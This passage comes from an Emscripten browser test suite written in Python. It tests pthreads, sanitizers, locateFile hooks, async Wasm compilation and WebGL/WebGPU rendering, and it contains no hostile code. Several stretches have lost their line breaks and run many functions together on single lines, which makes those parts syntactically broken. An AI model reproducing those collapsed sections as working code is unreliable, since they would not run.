  self.btest_exit(test_file('pthread/test_pthread_iostream.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])

# unistd I/O with pthreads and BigInt support enabled.
@requires_threads
def test_pthread_unistd_io_bigint(self):
  self.btest_exit(test_file('unistd/io.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sWASM_BIGINT'])

# Test that the main thread is able to use pthread_set/getspecific.
@also_with_wasm2js
@requires_threads
def test_pthread_setspecific_mainthread(self):
  self.btest_exit(test_file('pthread/test_pthread_setspecific_mainthread.c'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS'])

# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
  self.btest_exit(test_file('pthread/test_pthread_file_io.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])

# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
  # Build both without and with pthreads enabled.
  for args in [[], ['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8']]:
    self.btest_exit(test_file('pthread/test_pthread_supported.cpp'), args=['-O3'] + args)

@requires_threads
def test_pthread_dispatch_after_exit(self):
  self.btest_exit(test_file('pthread/test_pthread_dispatch_after_exit.c'), args=['-sUSE_PTHREADS'])

# Test the operation of Module.pthreadMainPrefixURL variable
@requires_threads
def test_pthread_custom_pthread_main_url(self):
  self.set_setting('EXIT_RUNTIME')
  ensure_dir('cdn')
  create_file('main.cpp', r'''
    #include <assert.h>
    #include <stdio.h>
    #include <string.h>
    #include <emscripten/emscripten.h>
    #include <emscripten/threading.h>
    #include <pthread.h>
    _Atomic int result = 0;
    void *thread_main(void *arg) {
      result = 1;
      pthread_exit(0);
    }

    int main() {
      pthread_t t;
      pthread_create(&t, 0, thread_main, 0);
      pthread_join(t, 0);
      assert(result == 1);
      return 0;
    }
  ''')

  # Test that it is possible to define "Module.locateFile" string to locate where worker.js will be loaded from.
  create_file('shell.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
  self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-sWASM=0', '-sIN_TEST_HARNESS', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-o', 'test.html'], reporting=Reporting.JS_ONLY)
  shutil.move('test.worker.js', Path('cdn/test.worker.js'))
  if os.path.exists('test.html.mem'):
    shutil.copyfile('test.html.mem', Path('cdn/test.html.mem'))
  self.run_browser('test.html', '', '/report_result?exit:0')

  # Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
  create_file('shell2.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
  self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-sWASM=0', '-sIN_TEST_HARNESS', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-o', 'test2.html'], reporting=Reporting.JS_ONLY)
  # The worker must now come from cdn/, so the local copy must be gone.
  try_delete('test.worker.js')
  self.run_browser('test2.html', '', '/report_result?exit:0')

# Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), that it's not a deadlock.
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
  self.btest_exit(test_file('pthread/test_pthread_proxying_in_futex_wait.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])

# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
  for aborting_malloc in [0, 1]:
    print('aborting malloc=' + str(aborting_malloc))
    # With aborting malloc = 1, test allocating memory in threads
    # With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
    self.btest_exit(test_file('pthread/test_pthread_sbrk.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '-sABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-sINITIAL_MEMORY=128MB'])

# Test that -sABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
  for opts in [[], ['-O2']]:
    for args in [[], ['-sUSE_PTHREADS']]:
      self.btest(test_file('gauge_available_memory.cpp'), expected='1', args=['-sABORTING_MALLOC=0'] + args + opts)

# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
  self.btest_exit(test_file('pthread/test_pthread_run_on_main_thread.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])

# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
  self.btest_exit(test_file('pthread/test_pthread_run_on_main_thread_flood.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])

# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async(self):
  self.btest_exit(test_file('pthread/call_async.c'), args=['-sUSE_PTHREADS'])

# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
  self.btest_exit(test_file('pthread/call_sync_on_main_thread.c'), args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread/call_sync_on_main_thread.js')])
  self.btest_exit(test_file('pthread/call_sync_on_main_thread.c'), args=['-O3', '-sUSE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_sync_on_main_thread.js')])
  self.btest_exit(test_file('pthread/call_sync_on_main_thread.c'), args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_sync_on_main_thread.js'), '-sEXPORTED_FUNCTIONS=_main,_malloc'])

# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads def test_pthread_call_async_on_main_thread(self): self.btest(test_file('pthread/call_async_on_main_thread.c'), expected='7', args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread/call_async_on_main_thread.js')]) self.btest(test_file('pthread/call_async_on_main_thread.c'), expected='7', args=['-O3', '-sUSE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_async_on_main_thread.js')]) self.btest(test_file('pthread/call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_async_on_main_thread.js')]) # Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area. @requires_threads def test_pthread_global_data_initialization(self): mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']] for mem_init_mode in mem_init_modes: for args in [['-sMODULARIZE', '-sEXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')], ['-O3']]: self.btest_exit(test_file('pthread/test_pthread_global_data_initialization.c'), args=args + mem_init_mode + ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sPTHREAD_POOL_SIZE']) @requires_threads @requires_sync_compilation def test_pthread_global_data_initialization_in_sync_compilation_mode(self): mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']] for mem_init_mode in mem_init_modes: args = ['-sWASM_ASYNC_COMPILATION=0'] self.btest_exit(test_file('pthread/test_pthread_global_data_initialization.c'), args=args + mem_init_mode + ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sPTHREAD_POOL_SIZE']) # Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread. 
@requires_threads
def test_pthread_clock_drift(self):
  self.btest_exit(test_file('pthread/test_pthread_clock_drift.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])

@requires_threads
def test_pthread_utf8_funcs(self):
  self.btest_exit(test_file('pthread/test_pthread_utf8_funcs.cpp'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])

# Test the emscripten_futex_wake(addr, INT_MAX); functionality to wake all waiters
@also_with_wasm2js
@requires_threads
def test_pthread_wake_all(self):
  self.btest_exit(test_file('pthread/test_futex_wake_all.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sINITIAL_MEMORY=64MB'])

# Test that stack base and max correctly bound the stack on pthreads.
@requires_threads
def test_pthread_stack_bounds(self):
  self.btest_exit(test_file('pthread/test_pthread_stack_bounds.cpp'), args=['-sUSE_PTHREADS'])

# Test that real `thread_local` works.
@requires_threads
def test_pthread_tls(self):
  self.btest_exit(test_file('pthread/test_pthread_tls.cpp'), args=['-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS'])

# Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD.
@requires_threads
def test_pthread_tls_main(self):
  self.btest_exit(test_file('pthread/test_pthread_tls_main.cpp'), args=['-sUSE_PTHREADS'])

@requires_threads
def test_pthread_safe_stack(self):
  # Note that as the test runs with PROXY_TO_PTHREAD, we set TOTAL_STACK,
  # and not DEFAULT_PTHREAD_STACK_SIZE, as the pthread for main() gets the
  # same stack size as the main thread normally would.
  self.btest(test_file('core/test_safe_stack.c'), expected='abort:stack overflow', args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sSTACK_OVERFLOW_CHECK=2', '-sTOTAL_STACK=64KB'])

@parameterized({
  'leak': ['test_pthread_lsan_leak', ['-gsource-map']],
  'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
@no_firefox('https://github.com/emscripten-core/emscripten/issues/15978')
def test_pthread_lsan(self, name, args=None):
  # Fixed: `args=[]` was a mutable default argument; use None as the default
  # and normalize inside the body instead.
  args = args or []
  self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=leak', '-sINITIAL_MEMORY=256MB', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)

@parameterized({
  # Reusing the LSan test files for ASan.
  'leak': ['test_pthread_lsan_leak', ['-gsource-map']],
  'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_asan(self, name, args=None):
  # Fixed: `args=[]` was a mutable default argument; use None as the default
  # and normalize inside the body instead.
  args = args or []
  self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=address', '-sINITIAL_MEMORY=256MB', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)

@requires_threads
def test_pthread_asan_use_after_free(self):
  self.btest(test_file('pthread/test_pthread_asan_use_after_free.cpp'), expected='1', args=['-fsanitize=address', '-sINITIAL_MEMORY=256MB', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '--pre-js', test_file('pthread/test_pthread_asan_use_after_free.js')])

@requires_threads
def test_pthread_asan_use_after_free_2(self):
  # similiar to test_pthread_asan_use_after_free, but using a pool instead
  # of proxy-to-pthread, and also the allocation happens on the pthread
  # (which tests that it can use the offset converter to get the stack
  # trace there)
  self.btest(test_file('pthread/test_pthread_asan_use_after_free_2.cpp'), expected='1', args=['-fsanitize=address', '-sINITIAL_MEMORY=256MB', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=1', '--pre-js', test_file('pthread/test_pthread_asan_use_after_free_2.js')])

@requires_threads
def test_pthread_exit_process(self):
  args = ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sPTHREAD_POOL_SIZE=2', '-sEXIT_RUNTIME', '-DEXIT_RUNTIME', '-O0']
  args += ['--pre-js', test_file('core/pthread/test_pthread_exit_runtime.pre.js')]
  self.btest(test_file('core/pthread/test_pthread_exit_runtime.c'), expected='onExit status: 42', args=args)

@requires_threads
def test_pthread_trap(self):
  # The pre-js reports back via maybeReportResultToServer whether the
  # expected 'unreachable' trap surfaced as a window error event.
  create_file('pre.js', '''
if (typeof window === 'object' && window) {
  window.addEventListener('error', function(e) {
    if (e.error && e.error.message.includes('unreachable'))
      maybeReportResultToServer("expected exception caught");
    else
      maybeReportResultToServer("unexpected: " + e);
  });
}''')
  args = ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sEXIT_RUNTIME', '--profiling-funcs', '--pre-js=pre.js']
  self.btest(test_file('pthread/test_pthread_trap.c'), expected='expected exception caught', args=args)

# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
def test_main_thread_em_asm_signatures(self):
  self.btest_exit(test_file('core/test_em_asm_signatures.cpp'), assert_returncode=121, args=[])

@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
  self.btest_exit(test_file('core/test_em_asm_signatures.cpp'), assert_returncode=121, args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sASSERTIONS'])

@requires_threads
def test_main_thread_async_em_asm(self):
  self.btest_exit(test_file('core/test_main_thread_async_em_asm.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sASSERTIONS'])

@requires_threads
def test_main_thread_em_asm_blocking(self):
  create_file('page.html', read_file(test_file('browser/test_em_asm_blocking.html')))
  self.compile_btest([test_file('browser/test_em_asm_blocking.cpp'), '-O2', '-o', 'wasm.js', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
  self.run_browser('page.html', '', '/report_result?8')

# Test that it is possible to send a signal via calling alarm(timeout), which
# in turn calls to the signal handler set by signal(SIGALRM, func);
def test_sigalrm(self):
  self.btest_exit(test_file('test_sigalrm.c'), args=['-O3'])

def test_canvas_style_proxy(self):
  self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', test_file('canvas_style_proxy_shell.html'), '--pre-js', test_file('canvas_style_proxy_pre.js')])

def test_canvas_size_proxy(self):
  self.btest(test_file('canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])

def test_custom_messages_proxy(self):
  self.btest(test_file('custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', test_file('custom_messages_proxy_shell.html'), '--post-js', test_file('custom_messages_proxy_postjs.js')])

def test_vanilla_html_when_proxying(self):
  for opts in [0, 1, 2]:
    print(opts)
    self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
    create_file('test.html', '<script src="test.js"></script>')
    self.run_browser('test.html', None, '/report_result?0')

def test_in_flight_memfile_request(self):
  # test the XHR for an asm.js mem init file being in flight already
  for o in [0, 1, 2]:
    print(o)
    opts = ['-O' + str(o), '-sWASM=0']
    print('plain html')
    self.compile_btest([test_file('in_flight_memfile_request.c'), '-o', 'test.js'] + opts)
    create_file('test.html', '<script src="test.js"></script>')
    self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
    print('default html')
    self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)

@requires_sync_compilation
def test_binaryen_async(self):
  # notice when we use async compilation
  script = '''
  <script>
  // note if we do async compilation
  var real_wasm_instantiate = WebAssembly.instantiate;
  var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
  if (typeof real_wasm_instantiateStreaming === 'function') {
    WebAssembly.instantiateStreaming = function(a, b) {
      Module.sawAsyncCompilation = true;
      return real_wasm_instantiateStreaming(a, b);
    };
  } else {
    WebAssembly.instantiate = function(a, b) {
      Module.sawAsyncCompilation = true;
      return real_wasm_instantiate(a, b);
    };
  }
  // show stderr for the viewer's fun
  err = function(x) {
    out('<<< ' + x + ' >>>');
    console.log(x);
  };
  </script>
  {{{ SCRIPT }}}
'''
  shell_with_script('shell.html', 'shell.html', script)
  common_args = ['--shell-file', 'shell.html']
  for opts, returncode in [
    ([], 1),
    (['-O1'], 1),
    (['-O2'], 1),
    (['-O3'], 1),
    (['-sWASM_ASYNC_COMPILATION'], 1), # force it on
    (['-O1', '-sWASM_ASYNC_COMPILATION=0'], 0), # force it off
  ]:
    print(opts, returncode)
    self.btest_exit('binaryen_async.c', assert_returncode=returncode, args=common_args + opts)
  # Ensure that compilation still works and is async without instantiateStreaming available
  no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
  shell_with_script('shell.html', 'shell.html', no_streaming + script)
  self.btest_exit('binaryen_async.c', assert_returncode=1, args=common_args)

# Test that implementing Module.instantiateWasm() callback works.
@parameterized({
  '': ([],),
  'asan': (['-fsanitize=address', '-sINITIAL_MEMORY=128MB'],)
})
def test_manual_wasm_instantiate(self, args=None):
  # Fixed: `args=[]` was a mutable default argument; use None as the default
  # and normalize inside the body instead.
  args = args or []
  self.compile_btest([test_file('manual_wasm_instantiate.cpp'), '-o', 'manual_wasm_instantiate.js'] + args)
  shutil.copyfile(test_file('manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
  self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')

def test_wasm_locate_file(self):
  # Test that it is possible to define "Module.locateFile(foo)" function to
  # locate where worker.js will be loaded from.
  ensure_dir('cdn')
  create_file('shell2.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
  self.compile_btest([test_file('browser_test_hello_world.c'), '--shell-file', 'shell2.html', '-o', 'test.html'])
  # Move the wasm into cdn/ so it is only reachable through the locateFile hook.
  shutil.move('test.wasm', Path('cdn/test.wasm'))
  self.run_browser('test.html', '', '/report_result?0')

@also_with_threads
def test_utf8_textdecoder(self):
  self.btest_exit('benchmark_utf8.cpp', 0, args=['--embed-file', test_file('utf8_corpus.txt') + '@/utf8_corpus.txt', '-sEXPORTED_RUNTIME_METHODS=[UTF8ToString]'])

@also_with_threads
def test_utf16_textdecoder(self):
  self.btest_exit('benchmark_utf16.cpp', 0, args=['--embed-file', test_file('utf16_corpus.txt') + '@/utf16_corpus.txt', '-sEXPORTED_RUNTIME_METHODS=[UTF16ToString,stringToUTF16,lengthBytesUTF16]'])

@also_with_threads
def test_TextDecoder(self):
  # Compare generated JS sizes across the three TEXTDECODER modes.
  self.btest('browser_test_hello_world.c', '0', args=['-sTEXTDECODER=0'])
  just_fallback = os.path.getsize('test.js')
  self.btest('browser_test_hello_world.c', '0')
  td_with_fallback = os.path.getsize('test.js')
  self.btest('browser_test_hello_world.c', '0', args=['-sTEXTDECODER=2'])
  td_without_fallback = os.path.getsize('test.js')
  # pthread TextDecoder support is more complex due to
  # https://github.com/whatwg/encoding/issues/172
  # and therefore the expected code size win there is actually a loss
  if '-pthread' not in self.emcc_args:
    self.assertLess(td_without_fallback, just_fallback)
  else:
    self.assertGreater(td_without_fallback, just_fallback)
  self.assertLess(just_fallback, td_with_fallback)

def test_small_js_flags(self):
  self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure=1', '-sINCOMING_MODULE_JS_API=[]', '-sENVIRONMENT=web'])
  # Check an absolute js code size, with some slack.
  size = os.path.getsize('test.js')
  print('size:', size)
  # Note that this size includes test harness additions (for reporting the result, etc.).
  self.assertLess(abs(size - 5500), 100)

# Tests that it is possible to initialize and render WebGL content in a pthread
# by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
def test_webgl_offscreen_canvas_in_pthread(self):
  for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
    self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2', '-sOFFSCREENCANVAS_SUPPORT', '-lGL'])

# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has once been used to render WebGL content in a pthread first
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
@disabled('This test is disabled because current OffscreenCanvas does not allow transfering it after a rendering context has been created for it.')
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
  for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
    self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2', '-sOFFSCREENCANVAS_SUPPORT', '-lGL'])

@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
def test_webgl_offscreen_canvas_only_in_pthread(self):
  self.btest_exit('gl_only_in_pthread.cpp', args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-sOFFSCREENCANVAS_SUPPORT', '-lGL', '-sOFFSCREEN_FRAMEBUFFER'])

# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
  self.btest_exit('webgl_draw_triangle.c', args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-sFULL_ES2=1'])

# Tests for WEBGL_multi_draw extension
# For testing WebGL draft extensions like this, if using chrome as the browser,
# We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
@requires_graphics_hardware
def test_webgl_multi_draw(self):
  self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png', args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS=1', '-DEXPLICIT_SWAP=1'])
  self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png', args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
  self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png', args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS=1', '-DEXPLICIT_SWAP=1'])
  self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png', args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])

# Tests for base_vertex/base_instance extension
# For testing WebGL draft extensions like this, if using chrome as the browser,
# We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
# If testing on Mac, you also need --use-cmd-decoder=passthrough to get this extension. # Also there is a known bug with Mac Intel baseInstance which can fail producing the expected image result. @requires_graphics_hardware def test_webgl_draw_base_vertex_base_instance(self): for multiDraw in [0, 1]: for drawElements in [0, 1]: self.btest('webgl_draw_base_vertex_base_instance_test.c', reference='webgl_draw_instanced_base_vertex_base_instance.png', args=['-lGL', '-sMAX_WEBGL_VERSION=2', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW=' + str(multiDraw), '-DDRAW_ELEMENTS=' + str(drawElements), '-DEXPLICIT_SWAP=1', '-DWEBGL_CONTEXT_VERSION=2']) @requires_graphics_hardware def test_webgl_sample_query(self): cmd = ['-sMAX_WEBGL_VERSION=2', '-lGL'] self.btest_exit('webgl_sample_query.cpp', args=cmd) @requires_graphics_hardware def test_webgl_timer_query(self): for args in [ # EXT query entrypoints on WebGL 1.0 ['-sMAX_WEBGL_VERSION'], # builtin query entrypoints on WebGL 2.0 ['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2'], # EXT query entrypoints on a WebGL 1.0 context while built for WebGL 2.0 ['-sMAX_WEBGL_VERSION=2'], ]: cmd = args + ['-lGL'] self.btest_exit('webgl_timer_query.cpp', args=cmd) # Tests that -sOFFSCREEN_FRAMEBUFFER rendering works. @requires_graphics_hardware def test_webgl_offscreen_framebuffer(self): # Tests all the different possible versions of libgl for threads in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]: for version in [[], ['-sFULL_ES3'], ['-sFULL_ES3']]: args = ['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1'] + threads + version print('with args: %s' % str(args)) self.btest_exit('webgl_draw_triangle.c', args=args) # Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0. 
@requires_graphics_hardware def test_webgl_vao_without_automatic_extensions(self): self.btest_exit('test_webgl_no_auto_init_extensions.c', args=['-lGL', '-sGL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0']) # Tests that offscreen framebuffer state restoration works @requires_graphics_hardware def test_webgl_offscreen_framebuffer_state_restoration(self): for args in [ # full state restoration path on WebGL 1.0 ['-sMAX_WEBGL_VERSION', '-sOFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'], # VAO path on WebGL 1.0 ['-sMAX_WEBGL_VERSION'], ['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=0'], # VAO path on WebGL 2.0 ['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'], # full state restoration path on WebGL 2.0 ['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-sOFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'], # blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67) ['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'], ]: cmd = args + ['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1'] self.btest_exit('webgl_offscreen_framebuffer_swap_with_bad_state.c', args=cmd) # Tests that -sWORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG rendering works. @requires_graphics_hardware def test_webgl_workaround_webgl_uniform_upload_bug(self): self.btest_exit('webgl_draw_triangle_with_uniform_color.c', args=['-lGL', '-sWORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG']) # Tests that using an array of structs in GL uniforms works. 
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
  self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-sMAX_WEBGL_VERSION=2'], reference='webgl_array_of_structs_uniform.png')

# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transferring of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@parameterized({
  '': ([False],),
  'asyncify': ([True],),
})
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
def test_webgl_offscreen_canvas_in_proxied_pthread(self, asyncify):
  cmd = ['-sUSE_PTHREADS', '-sOFFSCREENCANVAS_SUPPORT', '-lGL', '-sGL_DEBUG', '-sPROXY_TO_PTHREAD']
  if asyncify:
    # given the synchronous render loop here, asyncify is needed to see intermediate frames and
    # the gradual color change
    cmd += ['-sASYNCIFY', '-DASYNCIFY']
  print(str(cmd))
  self.btest_exit('gl_in_proxy_pthread.cpp', args=cmd)

@parameterized({
  'proxy': (['-sPROXY_TO_PTHREAD'],),
  '': ([],),
})
@requires_threads
@requires_graphics_hardware
@requires_offscreen_canvas
def test_webgl_resize_offscreencanvas_from_main_thread(self, args):
  # Cross blocking/non-blocking loop with OffscreenCanvas support on/off.
  for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
    for args3 in [[], ['-sOFFSCREENCANVAS_SUPPORT', '-sOFFSCREEN_FRAMEBUFFER']]:
      cmd = args + args2 + args3 + ['-sUSE_PTHREADS', '-lGL', '-sGL_DEBUG']
      print(str(cmd))
      self.btest_exit('resize_offscreencanvas_from_main_thread.cpp', args=cmd)

@requires_graphics_hardware
def test_webgl_simple_enable_extensions(self):
  for webgl_version in [1, 2]:
    for simple_enable_extensions in [0, 1]:
      cmd = ['-DWEBGL_CONTEXT_VERSION=' + str(webgl_version), '-DWEBGL_SIMPLE_ENABLE_EXTENSION=' + str(simple_enable_extensions), '-sMAX_WEBGL_VERSION=2', '-sGL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=' + str(simple_enable_extensions), '-sGL_SUPPORT_SIMPLE_ENABLE_EXTENSIONS=' + str(simple_enable_extensions)]
      self.btest_exit('webgl2_simple_enable_extensions.c', args=cmd)

@requires_graphics_hardware
def test_webgpu_basic_rendering(self):
  for args in [[], ['-sASSERTIONS', '--closure=1'], ['-sMAIN_MODULE=1']]:
    self.btest_exit('webgpu_basic_rendering.cpp', args=['-sUSE_WEBGPU'] + args)

def test_webgpu_get_device(self):
  for args in [['-sASSERTIONS', '--closure=1']]:
    self.btest_exit('webgpu_get_device.cpp', args=['-sUSE_WEBGPU'] + args)

# Tests the feature that shell html page can preallocate the typed array and place it
# to Module.buffer before loading the script page.
# In this build mode, the -sINITIAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this was is asm.js only (wasm needs a Memory).
def test_preallocated_heap(self):
